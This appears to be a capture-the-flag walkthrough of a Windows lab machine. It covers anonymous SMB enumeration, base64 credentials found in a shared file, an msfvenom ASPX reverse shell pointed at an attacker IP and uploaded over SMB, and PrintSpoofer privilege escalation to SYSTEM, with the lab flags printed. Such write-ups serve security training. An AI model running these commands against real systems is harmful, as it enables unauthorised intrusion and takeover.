edit /etc/hosts file to set the ip to hostname
-
nmap scan
- scanned all
-p- - found 80,135,139,445,3389,49663,49667,49669 open ports out of which 80, 49663 runs http
- os:
Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) - seems like we can get guest/user privileges through smb
- scanned all
-
on visiting port 80 (via browser) found this:
- browsing smb via smbclient (
smbclient -L 10.10.240.89 -U guest> prompted password > enter blank):
how to use reference
-
didn't have access to
ADMIN$andC$, then got access toIPC$but nothing there
-
checked the last shared foldar
nt4wrksv(smbclient //10.10.240.89/nt4wrksv -U guest), & foundpasswords.txtfile (downloaded usingmget)
-
file contains credentials encoded in base64
- found two users (& their passwords)
Bob - !P@$$W0rD!123&Bill - Juw4nnaM4n420696969!$$$
-
on p49663 we can access passwords.txt, found
nt4wrksvfrom gobuster scan
http://10.10.191.233:49663/nt4wrksv/passwords.txt)
-
created
.aspxreverse shell (msfvenom -p windows/x64/shell_reverse_tcp lhost=10.18.116.142 lport=443 -f aspx > relevant.aspx)
-
uploaded reverse shell via smb
-
visit
http://10.10.191.233:49663/nt4wrksv/relevant.aspx -
got initial access to the system
-
got
THM{fdk4ka34vk346ksxfr21tg789ktf45}inc:\Users\Bob\Desktop\user.txt -
testing
whoami /priv
-
seems like the
SeImpersonatePrivilegeis weak/vuln -
upload nc.exe to get back root shell
-
upload printspoofer.exe get higher priv
-
setup listener
nc -lnvp 443& executec:\inetpub\wwwroot\nt4wrksv\PrintSpoofer.exe -i -c cmd
-
got NT Autority (windows root equivalent)
-
got
THM{1fk5kf469devly1gl320zafgl345pv}inc:\Users\Administrator\Desktop\root.txt
